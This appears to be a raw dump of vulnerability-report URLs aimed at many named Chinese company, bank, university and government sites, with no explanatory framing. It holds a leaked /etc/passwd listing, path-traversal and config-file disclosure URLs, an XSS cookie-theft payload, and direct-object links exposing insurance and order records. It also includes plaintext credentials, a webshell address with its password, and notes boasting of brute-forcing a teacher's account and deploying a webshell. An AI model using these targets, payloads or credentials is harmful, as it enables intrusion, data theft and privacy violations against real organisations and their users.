https://mail.cofco.com IP:60.28.198.61 root:x:0:0:root:/root:/bin/bash bin:x:1:1:bin:/bin:/sbin/nologin daemon:x:2:2:daemon:/sbin:/sbin/nologin adm:x:3:4:adm:/var/adm:/sbin/nologin lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin sync:x:5:0:sync:/sbin:/bin/sync shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown halt:x:7:0:halt:/sbin:/sbin/halt mail:x:8:12:mail:/var/spool/mail:/sbin/nologin uucp:x:10:14:uucp:/var/spool/uucp:/sbin/nologin operator:x:11:0:operator:/root:/sbin/nologin games:x:12:100:games:/usr/games:/sbin/nologin gopher:x:13:30:gopher:/var/gopher:/sbin/nologin ftp:x:14:50:FTP User:/var/ftp:/sbin/nologin nobody:x:99:99:Nobody:/:/sbin/nologin dbus:x:81:81:System bus:/:/sbin/nologin rpc:x:32:32:Rpcbind Daemon:/var/cache/rpcbind:/sbin/nologin vcsa:x:69:69:virtual 
owner:/dev:/sbin/nologin abrt:x:173:173::/etc/abrt:/sbin/nologin saslauth:x:499:76:"Saslauthd saslauth:/sbin/nologin postfix:x:89:89::/var/spool/postfix:/sbin/nologin haldaemon:x:68:68:HAL daemon:/:/sbin/nologin ntp:x:38:38::/etc/ntp:/sbin/nologin rpcuser:x:29:29:RPC User:/var/lib/nfs:/sbin/nologin nfsnobody:x:65534:65534:Anonymous User:/var/lib/nfs:/sbin/nologin sshd:x:74:74:Privilege-separated SSH:/var/empty/sshd:/sbin/nologin tcpdump:x:72:72::/:/sbin/nologin oprofile:x:16:16:Special OProfile:/home/oprofile:/sbin/nologin puppet:x:500:500::/home/puppet:/sbin/nologin newmonitor:x:501:501::/Monitor:/bin/bash openvpn:x:498:496:OpenVPN:/etc/openvpn:/sbin/nologin chengang:x:502:502::/home/chengang:/bin/bash happy:x:503:503::/home/happy:/bin/bash apache:x:48:48:Apache:/var/www:/sbin/nologin nagios:x:504:505::/home/nagios:/bin/bash mysql:x:506:506::/home/mysql:/sbin/nologin cacti:x:507:507::/home/cacti:/bin/bash sichuan:x:508:508::/home/sichuan:/bin/bash skyworth:x:509:509::/home/skyworth:/bin/bash tcl:x:510:510::/home/tcl:/bin/bash cmcc:x:511:511::/home/cmcc:/bin/bash chip:x:512:512::/home/chip:/bin/bash guizhou:x:513:513::/home/guizhou:/sbin/nologin scdx:x:514:514::/home/scdx:/bin/bash cqyx:x:515:515::/home/cqyx:/bin/bash omusic:x:516:516::/home/omusic:/bin/bash api2:x:517:517::/home/api2:/bin/bash http://hn.centanet.com/view.aspx?id=13 https://mail.psbc.com exam.hiall.com.cn/exam.hiall.zip http://oa.998.com/login/Login.jsp?logintype=&gopage=&message=18 http://oa.998.com/page/element/Weather/View.jsp?ebaseid=weather&eid=5*&styleid=1%27&hpid=4%27&subCompanyId=1%27&e71415018052415=%27 http://tp.cpicorp.com.cn http://tp.cpicorp.com.cn/index.php?s=/Home/User/register.html http://tp.cpicorp.com.cn/index.php?s=/addon/Vote/Vote/join.html ftp://119.97.249.44/ https://vpn.sdx.js.cn http://jiudian.suning.com http://jiudian.suning.com/hotelpay-web/book3/result/20790.htm http://jiudian.suning.com/hotelpay-web/myHotelOrder/showHotelOrderDetail.htm?hotelOrderId=XXXXX 
url:http://crm.tv.tcl.com/DRP/ http://login.jzjt.com/contents/oaSys/_setupList.htm http://www.qy01.cn/db.rar http://meeting.minmetals.com.cn/ admin:admin http://www.chuguo.cn/laowu/admin/lw_applyView.aspx?Id=006 http://www.chuguo.cn/laowu/admin/lw_applyView.aspx?Id=007 http://epub.sipo.gov.cn/patent/tdcdesc.action?strWhere=CN103826724A&from=singlemessage&isappinstalled=0 http://epub.sipo.gov.cn/patent/tdcdesc.action?strWhere=CN203631036U ftp://zm.dftm.com.cn/WebHost/ http://zm.dftm.com.cn/ http://mimi.spriteapp.com/.svn/entries http://spriteapp.com/.git/config http://211.157.219.32/irpt/i/main/index.jsp http://211.157.219.32/irpt/i/main/login.jsp http://www.sdsft.gov.cn/sftproject/main.jsp?flag=flzyzgcx http://www.sdsft.gov.cn/sftproject http://58.32.246.85:10000/houtai http://58.32.246.85:10000/houtai/rpt_iqr_day.xls http://58.32.246.85:10000/houtai/announce_imgs/help.php http://www.yichengpin.com/ http://www.yichengpin.com/address/address-getSingleReceiverAddress.do?receiverAdd.userAddressId=129261&opert=edit http://oa.drpeng.com.cn/defaultroot/login.jsp http://www.wooyun.org/bugs/wooyun-2015-0126541/trace/4906d8c41ac7264f21d51c9a3c7d3344 http://jf.ztgame.com/ http://oa.cttqh.com/C6/Jhsoft.Web.login/PassWord.aspx http://oa.cttqh.com/C6/Jhsoft.Web.login/NewView.aspx?ID=10 http://oa.cttqh.com/C6/Jhsoft.Web.login/NewView.aspx?ID=10 http://cms.51hejia.com/phpsso_server/index.php?m=phpsso&c=index&a=getapplist&auth_data=v=1&appid=1&data=e5c2VAMGUQZRAQkIUQQKVwFUAgICVgAIAldVBQFDDQVcV0MUQGkAQxVZZlMEGA9+DjZoK1AHRmUwBGcOXW5UDgQhJDxaeQVnGAdxVRcKQ http://mail.10035.com.cn/AppClientUpgrade/admin/adminMain.do https://github.com/effyroth/mac_config/blob/b34c0c50cd681b2a26d02a6a52e91889ced4205e/.zsh_history code.sohuno.com/kzapp code.sohuno.com/kzapp encap:Ethernet b7:33:12 addr:10.110.19.54 Bcast:10.110.19.55 Mask:255.255.255.252 feb7:3312/64 Scope:Link administrator:x:1000:1000:administrator,,,:/home/administrator:/bin/bash 
administrator:x:0:0:administrator,,,:/home/administrator:/bin/bash www.kuaizhan.com http://63.216.63.34:8080/ http://user.kongfz.com/retrieve/index.html inurl:WebServlet?go=Str= http://www.bankofshanghai.com/WebServlet?go=shbank_corporateaccount_pg_DepositorInfoDetail&depositorIdStr=Vy1OQh5ea5s=xdW9Q6Do2oU=&competentOrganizationIdStr=Vy1OQh5ea5s=JHyaOoVTyZk=&competentOrganization.remark=print http://www.bankofshanghai.com/WebServlet?go=shbank_corporateaccount_pg_DepositorInfoDetail&depositorIdStr=Vy1OQh5ea5s=xdW9Q6Do2oU=&competentOrganizationIdStr=Vy1OQh5ea5s=JHyaOoVTyZk=&competentOrganization.remark=print http://www.bankofshanghai.com/WebServlet?go=shbank_corporateaccount_pg_SignContractDetail&signContractIdStr=Vy1OQh5ea5s=gtFfELZEEBE=&signContract.remark=print_common http://www.bankofshanghai.com/WebServlet?go=shbank_corporateaccount_pg_SignContractDetail&signContractIdStr=Vy1OQh5ea5s=nbBAsbh9l/0=&signContract.remark=print_special http://www.youlu.net/userCenter/forgetPassword/ http://oa.letao.com/wap/app_download.aspx?bid=14&op=brand http://oa.letao.com//wap/shoe.aspx?add=&iid=1 http://**.**.**.**:81/newbook/detail.php?id=0110020237 http://**.**.**.**/newbook/detail.php?id=0200004109 http://**.**.**.**:8080/newbook/detail.php?id=0200021876 http://**.**.**.**/newbook/detail.php?id=0200004232 http://sipo.gov.cn/ http://sipo.gov.cn:80/ http://www.shrc.com.cn/indexWebAction.action中按如图方式操作(点击红框位置) http://www.shrc.com.cn/perResumeAction.action) http://www.shrc.com.cn/perResumeView.action?id=505967) http://idc.jb51.net/clientcenter/news.asp?id=601 http://isafe.xmu.edu.cn http://isafe.xmu.edu.cn/servlet/FileDownLoad?filename=../index.jsp http://isafe.xmu.edu.cn/staticPage_staticPage.action?id=6 www.szsharelink.com是中兴自己开发的支付系统,类似支付宝等等。 http://pm.szsharelink.com是JIRA系统,和网上漏洞类似,可以直接注册账号并登陆: http://www.house5.net/case.html http://smg.cscec1b.net/ http://smg.cscec1b.net:80/ http://dongyuan.hiall.com.cn/s.php ftp://14.204.23.103/ 
http://haokan.17k.com/WEB-INF/classes/jdbc.properties http://haokan.17k.com/WEB-INF/web.xml http://haokan.17k.com/WEB-INF/classes/log4j.properties http://login.jzjt.com/web/ http://login.jzjt.com/web/site.mdb http://login.jzjt.com/web/site_counts.mdb http://202.202.43.242/2015cjyrecord/ http://202.202.43.242/2015cjyrecord/yj_static/ http://202.202.43.242/2015cjyrecord/yj_static/upload_excel/ http://lsjpk.cncnc.edu.cn/admin/index.asp http://lsjpk.cncnc.edu.cn/info.asp?id=44 http://lsjpk.cncnc.edu.cn/info.asp?id=44 http://61.236.129.245/system/uploadPic.asp http://61.236.129.245/file/ http://**.**.**.**:8080/pages/offLine/questerOffLineDeal_old.jsp http://**.**.**.**:8080/pages/offLine/questerOffLineDeal_old.jsp http://**.**.**.**:8080/pages/offLine/questerOffLineDeal_old.jsp http://**.**.**.**:8080/pages/offLine/questerOffLineDeal_old.jsp http://**.**.**.**:8080/pages/offLine/questerOffLineDeal_old.jsp http://**.**.**.**:8080/pages/offLine/questerOffLineDeal_old.jsp http://**.**.**.**:8080/pages/offLine/questerOffLineDeal_old.jsp http://**.**.**.**:8080/pages/offLine/questerOffLineDeal_old.jsp http://**.**.**.**:8080/pages/offLine/questerOffLineDeal_old.jsp http://223.223.197.242:8888 http://www.wandoujia.com/cloud/#/portal http://www.lib.sicnu.edu.cn/dyna/pfdetail.asp?node=1 http://www.lib.sicnu.edu.cn/dyna/pfdetail.asp?node=1 http://sqlmap.org http://223.223.197.242:81/console/ http://**.**.**.**/bugs/wooyun-2015-0115361 http://mail.wh.gov.cn/register/user_checkUI.do https://admin1.17u.com https://dy.ly.com http://club.coolpad.com/uc_server/admin.php http://58.68.146.109/ http://58.68.146.109:8090/ www.anxin.com)是君安信(北京)科技有限公司的独立品牌。安心贷成立于2011年,是中国较早开始运营的P2P网贷平台。 http://www.sec1999.com/systemUserJson!checkUserName.action http://zrbg.bcia.com.cn/111.jsp http://59.49.23.3/ http://www.xb.cgdc.com.cn/jmx-console http://passport.bookuu.com/getpassword.php www.picooc.com 
http://shenbao.gzwater.gov.cn/jhysDataManage/enterpriseDataAction!showQyInfo.action?qyjsqydm=200207578 http://slpc.ahsl.gov.cn/include/content.php?id=748 http://career.sdebank.com/uapws/service/nc.itf.ses.inittool.SESInitToolService?wsdl http://career.sdebank.com/uapws/service/ http://124.127.187.4:8080/qcar/ http://sms.iddsms.com http://user.56.com/sftp-config.json http://cs.now.cn/html/b.php http://hb.189.cn/pages/selfservice/custinfomanager/password/password.jsp http://hb.189.cn//pages/selfservice/custinfomanager/password/newtieinProductresultMusterAction.action http://www.yulinct.com/UF/Uploads/Idcard/ http://m.hundsun.com http://synergy.hundsun.com:89 https://passport.vivo.com.cn/v3/web/findpwd/findPwd http://218.65.95.164:8081/cms/ jdbc:jtds:sqlserver://127.0.0.1:1433/cms jdbc:mysql://localhost:3306/bms?useUnicode=true&characterEncoding=utf-8 jdbc:jtds:sqlserver://192.168.0.125:1433/SmsDB jdbc:jtds:sqlserver://127.0.0.1:1433/dms jdbc:jtds:sqlserver://127.0.0.1:1433/fms http://112.124.57.112/ http://shopping.bcia.com.cn http://61.232.6.108/uapws/service/ http://61.232.6.108/uapws/service/nc.itf.ses.inittool.SESInitToolService?wsdl http://210.75.250.240/CjetMgr/login/login_validate.do http://www.suningcloud.com/ www.suningcloud.com http://www.suningcloud.com http://exam.sunlands.com/portal-war-exam/pt_ea/orderConfirm/viewOrderConfirmPage.action?editFlag=Y&actionFlag=showExamUserInfo&period=201509&orderId=49613 http://exam.sunlands.com/portal-war-exam/pt_ea/orderConfirm/viewOrderConfirmPage.action?editFlag=Y&actionFlag=showExamUserInfo&period=201509&orderId=49614 http://exam.sunlands.com/portal-war-exam/pt_ea/orderConfirm/viewOrderConfirmPage.action?editFlag=Y&actionFlag=showExamUserInfo&period=201509&orderId=49618 http://124.207.179.237/ http://**.**.**.** http://union.baofeng.com/login http://union.baofeng.com/_profiler/empty/search/results?limit=100 http://union.baofeng.com/_profiler/b616dc http://union.baofeng.com/_profiler/60e43b 
http://union.baofeng.com/_profiler/79e874 http://union.baofeng.com/_profiler/e6a93e http://union.baofeng.com/_profiler/40f295 http://www.guoli.com/cy/index.php?&subject=00&longterm=2 http://www.guoli.com/cy/index.php?&subject=00&longterm=2 http://uc.nearme.com.cn/usercenter/login.jsp?backurl=http%3A%2F%2Fpan.nearme.com.cn&u=http%3A%2F%2Fyun.baidu.com%2Fxcloud%2Fnearme%2Fpan%2F http://gafw.jl.gov.cn/changchun/info.jsp?infoid=14842 http://www.flycua.com/member/auth!getUserInfo.shtml地址会返回用户的真实姓名、手机号。只需要用户在登录状态,不校验referer,没有token,所以可以跨域请求。 http://admin.zhunbai.com/phpmyadmin http://b.cnhubei.com/phpsso_server/index.php?m=phpsso&c=index&a=getapplist&auth_data=v=1&appid=1&data=228aAFIFVgkGVQEEAFMJUQIEAlVQBlVUBwYMUwZCWwIFA0dAEWoHTEINbl9VTwxqe0tnCwoyRkBlPA0Gf3h%2FEFpbNUkNbDBeAF1nc35PcA http://www.longmanenglish.cn/index.html,可通过获取的用户名进行弱口令爆破。某位老师的账号成功爆破出来,提前获取考题。实现一学期不学习成学霸的梦想。 http://124.207.220.61 http://124.207.220.61/images/logo.jpg http://124.207.220.61/staffs/login.do http://124.207.220.61/staffs/;jsessionid=LvqcVlWpmk4Lfb4xPgwNpqgvk11RGpDR6TFBVz15Xfpkq4jhMnxn!-1586081693 http://124.207.220.61/staffs/;jsessionid=LvqcVlWpmk4Lfb4xPgwNpqgvk11RGpDR6TFBVz15Xfpkq4jhMnxn!-1586081693 http://www.yiqifa.com:80/ http://app.metao.com/.git/config https://www.exploit-db.com/exploits/37423/ http://ppcc.ruc.edu.cn/ http://ppcc.ruc.edu.cn//install/hello.php http://124.160.71.245:82/ecms/Admin/ http://124.160.71.245:81/ http://124.160.71.245:81/mydb/ http://124.160.71.245/ http://www.xingyuhotel.com/english/news.php?id=28&typeid=2 http://**.**.**.**//servlet/fileOpenforms?filename=/WEB-INF/WEB.xml http://**.**.**.**//servlet/fileOpenforms?filename=/WEB-INF/WEB.xml http://**.**.**.**/servlet/fileOpenforms?filename=/WEB-INF/WEB.xml http://**.**.**.**:8088/servlet/fileOpenforms?filename=/WEB-INF/WEB.xml http://**.**.**.**//servlet/fileOpenforms?filename=/WEB-INF/WEB.xml http://**.**.**.**/servlet/fileOpenforms?filename=/WEB-INF/WEB.xml 
http://**.**.**.**//servlet/fileOpenforms?filename=/WEB-INF/WEB.xml http://**.**.**.**:8080//servlet/fileOpenforms?filename=/WEB-INF/WEB.xml www.gongren8.com https://github.com/search?q=gongren8.com&ref=searchresults&type=Code&utf8=%E2%9C%93 https://github.com/testerHobbit/TestPY/blob/6406eae20e3952f9046d944fbce212230a384244/testMysql/testmysql.py http://www.zousifun.com/admin/cms/info_xpage.do http://222.77.179.253:8090 http://login.jzjt.com/jznw/zwMore.jsp?comp=11 http://login.jzjt.com/contents/oaBBS/13.jsp?id=153 http://218.65.95.151:8088/ http://219.139.240.32:8080/ http://call.fezo.com.cn/login ftp://222.73.44.98/ ftp://222.73.44.98/IT2.10%20201505/Web.config http://www.hebzx.gov.cn/web.rar http://oa.sxky.cn/defaultroot/login.jsp http://oa.sxky.cn/console/ http://oa.sxky.cn/ceshi/ http://www.coremail.cn/的用户列表,恰好有个朋友她们用的就是该邮件系统的邮箱,故让其帮忙申请了个内部邮箱,一番测试果然该处存在xss漏洞,触发简单,容易中招。 http://www.weimeigu.com/flash/getflash.php?id=127 http://isv.suningcloud.com land.minmetals.com.cn/upload/attachment/ hnc2626.minmetals.com.cn/upload/attachment/ torchcn.minmetals.com.cn/upload/attachment/ resources.minmetals.com.cn/upload/attachment/ http://union.winenice.com http://119.188.7.130:7001/fybj/index.admin.jsp http://119.188.7.130:7001/fybj/ http://119.188.7.130:7001/sdggws http://119.188.7.130:7001/console/login/LoginForm.jsp http://www.ahwst.gov.cn:8080/defaultroot/login.jsp http://www.ahwst.gov.cn:8080/console http://www.ahwst.gov.cn:8080/ceshi/ http://mail.lookango.com/的人估计应该是处女座的,不然咋设置的邮箱密码咋那么有规律? 
http://pm.ncmcc.com.cn/hykg/ http://www.teachina.com/up/ http://www.teachina.com/up/20131109210255.asp(密码:8888) http://www.teachina.com/up/20120503164837.aspx http://www.cofco-health.com/ http://www.tuhsu.com.cn/ http://www.teachina.com/ http://chinatea.com.cn/ http://www.cofco-health.com/ http://www.ccsa.org.cn/showgn.php3?source=yd&id=4550 com:27017 http://202.108.103.137/admin/ http://fw.fs110.gov.cn/shownews.aspstyle=zagl&id=76 www.capub.cn http://lvyou.jyyuan.com/Hotel/Hotel_Room.php?HId=11 http://123.126.136.35/newsedit/batman/Login.jsp http://223.223.197.242:13988/ http://www.beidoudb.com:88/ http://www.beidoudb.com:88/document/uploads/ http://www.beidoudb.com:88/document/uploads/a182e558-521c-4609-ba94-e621d6bf8bf5.txt http://www.beidoudb.com:88/BackStage/User/Useradd.php http://www.beidoudb.com:88/BackStage/User/Userlist.php www.castcc.com http://ysh.cpicorp.com.cn/news.asp?id=2560 http://ysh.cpicorp.com.cn/news.asp http://sqlmap.org http://www.suningcloud.com/ www.suningcloud.com http://www.suningcloud.com http://account.tcl.com/tclcustomerfindpwd/toFindPwdStep1?ReturnUrl=http://mall.tcl.com/&resource=shoptcl http://wooyun.org/searchbug.php?q=5LiH6L6%2B&pNO=2 http://gcms.admin.cnsuning.com/queryLargePuchase.action http://gcms.admin.cnsuning.com/queryLargePuchase.action http://www.yiqifa.com:80/searchCampaignBeginList.do?auditingType=-1 www.pg.com.cn http://apis.map.qq.com/uri/1/geocoder?latlng=23.137287,113.373192&referer=pcqq http://m.jinjianginns.com//order/list?guestId=*&tel=&channel=HOTELVP_JJZX_WAP http://m.jinjianginns.com/order/list?guestId=50181503&tel=&channel=HOTELVP_JJZX_WAP http://m.jinjianginns.com/order/list?guestId=50181899&tel=&channel=HOTELVP_JJZX_WAP http://wx.aeonlife.com.cn/baodan/BXHTCX.do?customerNo=&contno=1130101000045448&openId=oCrFruEGq1f4zAu72MA4le2v_X0M http://wx.aeonlife.com.cn/baodan/BXHTCX.do http://wx.aeonlife.com.cn/baodan/BXHTCX.do?customerNo=&contno=1130101000045448&openId=oCrFruEGq1f4zAu72MA4le2v_X0M 
http://wx.aeonlife.com.cn/baodan/BXHTCX.do?customerNo=&contno=1130101000051348&openId=oCrFruEGq1f4zAu72MA4le2v_X0M http://wx.aeonlife.com.cn/baodan/BXHTCX.do?customerNo=&contno=1130101000051338&openId=oCrFruEGq1f4zAu72MA4le2v_X0M http://www.etaoshi.com/canting/Map/HomeMap?s=cqjgbmfd http://www.cool170.com https://trade.gfund.com/etrading/ https://trade.gfund.com/is2/cmd.jsp http://bbs.utouu.com/uc_server/admin.php http://mail.zto.cn/index.php http://chat9.jd.com/ http://www.cfwhw.gov.cn/sysadmin/login.jsp http://www.polycinemas.com/website/register.jsp?current=vip_index http://www.polycinemas.com/website/reset_password.jsp?username=wooyun123 http://wooyun.org/bugs/wooyun-2015-0126685 http://www.anxin.com/usercenter/userinfo/Default.html http://www.anxin.com/usercenter/userinfo/default.html?p=getback http://www.anxin.com/usercenter/money/bankcard.html?a=show http://www.ccsa.org.cn/worknews/content.php3?id=3121 http://sqlmap.org http://sp1.baidu.com.cn/dan.php?c=IZ0-5HDYnW0snWRzPWT0IgF_5y9YIZ0lQzqYQhP8QdFnTy9kiYY0 http://pk.match.ali213.net/login?id=1 http://pk.match.ali213.net http://www.begcl.com/ http://www.begcl.com/rbac/ http://119.254.24.11/userLogin http://campus.tcl.com/Portal/Account/Login这个是TCL集团校招网申系统登陆接口,发现没有验证码 http://a100.aeonlife.com.cn/salesupport/policy/policyTable.jsp?ym=1320302000008728 http://a100.aeonlife.com.cn/salesupport/policy/policyTable.jsp?ym=1320301000007128 http://a100.aeonlife.com.cn/salesupport/policy/policyTable.jsp?ym=1320302000007128 http://a100.aeonlife.com.cn/salesupport/policy/policyTable.jsp?ym=1320302000007228 http://a100.aeonlife.com.cn/salesupport/policy/policyTable.jsp?ym=1320302000007328 http://a100.aeonlife.com.cn/salesupport/policy/policyTable.jsp?ym=1320302000007428 http://a100.aeonlife.com.cn/salesupport/policy/policyTable.jsp?ym=1320302000007528 http://www.yileyoo.com/ey_game_update/adjustGame.html?gamename= http://61.132.136.226/views/show/33336.htm www.fjcyl.com http://ty1.fjcyl.com:10000/login.jsp 
http://www.ahty.gov.cn/xwzx-xwfb/article.jsp?articleId=31525 http://pan.pingan.com/login www.yishion.com.cn/spread.php?timeforspread=1 http://vip.yishion.com/backEnd/login.php http://**.**.**.**/search/index/portalId/1?portal_model_code=&keyword=x&s=%CB%D1%CB%F7 http://**.**.**.**/search/index/portalId/409?portal_model_code=&keyword=x&s=%CB%D1+%CB%F7 http://**.**.**.**/search/index/portalId/402?portal_model_code=&keyword=x&s=%CB%D1+%CB%F7 http://**.**.**.**/search/index/portalId/403?portal_model_code=&keyword=x&s=%CB%D1+%CB%F7 http://**.**.**.**/search/index/portalId/402?portal_model_code=&keyword=x&s=%CB%D1+%CB%F7 http://**.**.**.**/search/index/portalId/662?portal_model_code=&keyword=x&s=%CB%D1+%CB%F7 http://**.**.**.**/search/index/portalId/407?portal_model_code=&keyword=x&s=%CB%D1%CB%F7 http://**.**.**.**/search/index/portalId/644?portal_model_code=&keyword=x&s=%CB%D1%CB%F7 www.he-pai.cn http://www.he-pai.cn http://218.65.95.152:8081/jzRole/Login.action http://218.65.95.152:8081/jzRole/nandi.jsp http://tbisp.tba.gov.cn/ https://61.178.118.80/ http://**.**.**.**:8080/servlet/keywordEditServlet?kid=184 http://**.**.**.**:8080/servlet/keywordEditServlet?kid=3 http://**.**.**.**:8080/servlet/keywordEditServlet?kid=1425 http://**.**.**.**:8080/servlet/keywordEditServlet?kid=1254 http://**.**.**.**:8080/servlet/keywordEditServlet?kid=2 http://**.**.**.**:8080/servlet/keywordEditServlet?kid=1 http://**.**.**.**:8080/servlet/keywordEditServlet?kid=4 http://**.**.**.**:8080/servlet/keywordEditServlet?kid=2 http://**.**.**.**:8080/servlet/keywordEditServlet?kid=33 http://**.**.**.**:8080/servlet/keywordEditServlet?kid=1 http://**.**.**.**:8080/servlet/kbsearch?state=0 http://**.**.**.**:8080/servlet/kbsearch?state=0 http://**.**.**.**:8080/servlet/kbsearch?state=0 http://**.**.**.**:8080/servlet/kbsearch?state=0 http://**.**.**.**:8080/servlet/kbsearch?state=0 http://**.**.**.**:8080/servlet/kbsearch?state=0 http://**.**.**.**:8080/servlet/kbsearch?state=0 
http://**.**.**.**:8080/servlet/kbsearch?state=0 http://**.**.**.**:8080/servlet/kbsearch?state=0 http://**.**.**.**:8080/servlet/kbsearch?state=0 http://**.**.**.**:8080/servlet/delquestion?qid=2 http://**.**.**.**:8080/servlet/delquestion?qid=4 http://**.**.**.**:8080/servlet/delquestion?qid=150 http://**.**.**.**:8080/servlet/delquestion?qid=2 http://**.**.**.**:8080/servlet/delquestion?qid=1 http://**.**.**.**:8080/servlet/delquestion?qid=2 http://**.**.**.**:8080/servlet/delquestion?qid=1 http://**.**.**.**:8080/servlet/delquestion?qid=47 http://**.**.**.**:8080/servlet/delquestion?qid=1 http://cecms.yixin.com http://torder.ufida.com.cn/UFSIMS/Partner/PartnerUserUP.aspx?kehubianma=KHBBJXYD20141112105221 http://torder.ufida.com.cn/UFSIMS/admin/adminUserSpecialSP.aspx?oFlag=Sel&pk=6480_5712_2704_5808_11020_5200_5768_5814_5616_10165_6000_5304_2964_6534_11020_5300_5768_4896_5824_10165_6360_5814_2548_6534 http://torder.ufida.com.cn/ufsims/partner/partneruserchancemx.aspx?flag=sel&baobeibianma=sjbbjxyd20140217081419 http://torder.ufida.com.cn/UFSIMS/Partner/PartnerUserDiscountUP.aspx?oFlag=Modify&seq=6480_5304_2912_5808_11020_5300_5150_4896_5200_10165_6000_5508_2496_5808_11020_5400_5150_5814_5200_10165_6480_5508_2548_6050 http://torder.ufida.com.cn/UFSIMS/admin/adminUserSpecialSP.aspx?oFlag=Sel&pk=6360_5712_2912_5808_11020_5200_5768_5814_5616_10165_6000_5304_2964_6534_11020_5400_4944_5406_4992_10165_6480_4998_2704_6776_11020_5200_5768_4896_4992 http://www.pcschool.com.tw/activity/phone/Yahoo_Tcode.asp?pno= http://www.jinerdai.com/articlelist.page?type_id=05 http://menpiao.suning.com/trip-web/order/orderFillIn.htm?realSenId=SN152381&realProductId=SN111013866&realBranchId=1013866&realSalePrice=125(带入的金额)&realMarketPrice=170&realNum=1&realDate=2015-07-17 http://60.255.41.58 http://inside.baidu.com/sql/.svn/entries http://1.202.208.18:8080/login.html http://61.191.199.41/ http://61.191.199.41/Manage/default.php 
http://61.191.199.41/Manage/downloads.php?FileName=../configs.inc.php upload:http://61.191.199.41/tzl/upload.php http://www.ucaiyuan.com/forgetpwd http://www.lepao.com ftp://sxscredit.gov.cn http://www.hljzx.gov.cn:80/ www.hljzx.gov.cn http://**.**.**.**/Tools/stream/FlvStream.ashx?file=./web.config http://**.**.**.**/Tools/stream/FlvStream.ashx?file=./web.config http://**.**.**.**/Tools/stream/FlvStream.ashx?file=./web.config http://**.**.**.**/Tools/stream/FlvStream.ashx?file=./web.config http://**.**.**.**/Tools/stream/FlvStream.ashx?file=./web.config http://**.**.**.**/Tools/stream/FlvStream.ashx?file=./web.config http://**.**.**.**/Tools/stream/FlvStream.ashx?file=./web.config http://**.**.**.**/Tools/stream/FlvStream.ashx?file=./web.config http://**.**.**.**/Tools/stream/FlvStream.ashx?file=./web.config http://**.**.**.**/Tools/stream/FlvStream.ashx?file=./web.config http://**.**.**.**/Tools/stream/FlvStream.ashx?file=./web.config http://**.**.**.**/Tools/stream/FlvStream.ashx?file=./web.config http://**.**.**.**/Tools/stream/FlvStream.ashx?file=./web.config http://**.**.**.**/Tools/stream/FlvStream.ashx?file=./web.config http://**.**.**.**/Tools/stream/FlvStream.ashx?file=./web.config http://**.**.**.**/Tools/stream/FlvStream.ashx?file=./web.config http://**.**.**.**/Tools/stream/FlvStream.ashx?file=./web.config http://cmdp.ncc.cma.gov.cn/drought/frost/area.php?filterType=nation&id=1 http://www.hebaodai.com/ http://ims.zj31.net/pm/ www.23ye4.com/com_news_show.asp?showid=556。找到VPN的地址、用户名规则、默认密码。最重要的是大体了解了配置方式。 www.docin.com/p-575094174.html http://ec1.crcc.cn:80/b2b/web/two/indexinfoAction.do?actionType=showOneProduct&dwbm=00100000370&sbwzly=0&xh=1 http://ec1.crcc.cn:80/b2b/web/two/indexinfoAction.do?actionType=showOneProduct&dwbm=00100000370&sbwzly=0&xh=1 http://59.151.126.67:7001/console用weblogic/weblogic成功登录之后,deploy大马也顺利。 http://www.dlrcb.cn:80/newswebui/newsearchmapframe.aspx?searchtext= http://zfgjj.hanzhong.gov.cn/ 
http://zfgjj.hanzhong.gov.cn/login.jsp http://zfgjj.hanzhong.gov.cn/upload/download/1436977974459yjh.jsp http://adorders.huiyan.baofeng.com/ focus.stock.hexun.com/struts/.%252e/.%252e/.%252e/.%252e/.%252e/.%252e/.%252e/etc/passwd https://lejifen.taccb.com.cn/jfyMall/ https://jf.pzhccb.com/jfyMall/ https://jf.jn-bank.com/jfyMall/ https://jf.qsbank.cc/jfyMall/ https://jf.dyccb.net/jfyMall/ https://jf.pznsh.com/jfyMall/ https://lejifen.taccb.com.cn/jfyMall/ TM:114274342 PWD:gdcrm@123 http://www.hwjyw.com/about-us.html http://123.125.120.88/hwjyw/search.jsp http://123.125.120.88/cK/foot.jsp http://124.127.187.241/ http://wd.suning.com/ http://jwvideo.tyust.edu.cn/opencourse.aspx?cid=1 http://www.jzjt.com/ http://www.jzjt.com/wp-content/plugins/w3-total-cache/wooyun.php http://218.65.95.176/webfw/sys/login.action http://218.65.95.162/ysbx/main.do http://chuyuan.jzjt.com/admin/ http://218.65.95.152:8088/GetLoginInfo.asmx http://tempuri.org/GetTelNumberByIMSI soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance xmlns:xsd="http://www.w3.org/2001/XMLSchema xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/ soap:Body http://tempuri.org/ soap:Body soap:Envelope http://www.haodai.com/ajax/getpasswd http://www.anjucn.net/documents.jsp?alias=%E5%AE%89%E5%B1%85%E7%99%BE%E7%A7%91 http://15th.300.cn/ce_15th/story/10?search_company=&search_name= http://124.207.179.212/netrep/index.jsp http://mail2.glsc.com.cn:8084/names.nsf?Login http://mail2.glsc.com.cn:8093/stcenter.nsf?OpenDatabase http://oa.glsc.com.cn http://campus.coolpad.com/index.php?c=schoolRecruitment&f=jobPosition&cate=all&id=dg== http://www.pznews.com inurl:/opac_two/search2 http://**.**.**.**/opac_two/postinformation/list_holdretrieve.jsp?kind=query http://**.**.**.**/opac_two/postinformation/list_recall.jsp?kind=query http://110.249.165.66:8012/wtk/czznfw.action?problemid=0&xlsysid=171 
http://wap.sogou.com/web/searchList.jsp?uID=4uuU0hrg8f0RIL-c&v=5&w=1278&t=1437010229530&s_t=1437010266422&keyword=%3Cscript%3Ealert%28document.cookie%29%3C%2Fscript%3E&pg=webSearchList http://www.teachina.com/ http://www.teachina.com/map.aspx http://www.newv.com.cn/case_enterprise.html http://www.newv.com.cn/case_college.html http://www.newv.com.cn/case_government.html http://volvo.infolearning.so/bos/desktop/RequestOrResponse.aspx?type=hits&isHits=Y&contentUid=1 http://chrysler.infolearning.so/bos/desktop/RequestOrResponse.aspx?type=hits&isHits=Y&contentUid=1 http://118.122.88.90:65000//bos/desktop/RequestOrResponse.aspx?type=hits&isHits=Y&contentUid=1 http://exam.ecustmde.com/bos/desktop/RequestOrResponse.aspx?type=hits&isHits=Y&contentUid=1 http://exam.qdgw.edu.cn/bos/desktop/RequestOrResponse.aspx?type=hits&isHits=Y&contentUid=1 http://exp.chinaopenschool.com/kl/bos/desktop/RequestOrResponse.aspx?type=hits&isHits=Y&contentUid=1 